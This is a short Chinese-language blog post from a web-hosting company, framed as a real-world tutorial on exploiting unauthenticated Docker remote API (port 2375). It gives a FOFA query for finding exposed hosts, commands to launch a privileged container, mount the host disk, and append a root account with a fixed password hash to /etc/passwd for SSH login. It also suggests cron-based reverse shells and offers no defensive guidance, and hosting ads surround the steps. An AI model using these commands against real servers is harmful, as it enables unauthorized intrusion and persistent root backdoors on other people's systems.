实战Docker未授权访问提权-创新互联

1、fofa关键字 port=“2375” && body=“page not found”
在这里插入图片描述
2、docker -H tcp://ip:port 可查看到当前所有的实例
在这里插入图片描述
3、docker -H tcp://ip:port pull alpine
在这里插入图片描述
4、docker -H tcp://ip:port run -it --privileged alpine bin/sh
在这里插入图片描述

创新互联建站-专业网站定制、快速模板网站建设、高性价比泰安网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式泰安网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖泰安地区。费用合理售后完善,10多年实体公司更值得信赖。

5、fdisk -l 查看其分区结构
在这里插入图片描述
6、创建一个test目录,并且将其 /dev/vda2 挂载至test
在这里插入图片描述
7、通过whoami 和id可查看到当前的权限是root
在这里插入图片描述
8、cat /etc/passwd 查看当前所有的用户信息
在这里插入图片描述
9、通过如下命令强制将账号sql 密码123 写入其passwd文件
echo “sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash” >>/test/etc/passwd
在这里插入图片描述

10、现在即可通过新加的账号sql:123去ssh连接,此时已经成功连接上
在这里插入图片描述
常见问题:
1、挂载其分区后并未能将账号加进去,原因是你挂载的分区可能不是其主节点,尝试挂载其他分区
2、成功写入账号后无法ssh连接,可通过cat test/etc/ssh/ssh_config 看起ssh配置文件是否限制了ssh账号密码登录,如果是可直接通过vi命令改回来
3、可通过定时任务的方式反弹shell,解决一切难题

你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧


分享文章:实战Docker未授权访问提权-创新互联
链接分享:http://scyanting.com/article/coicpc.html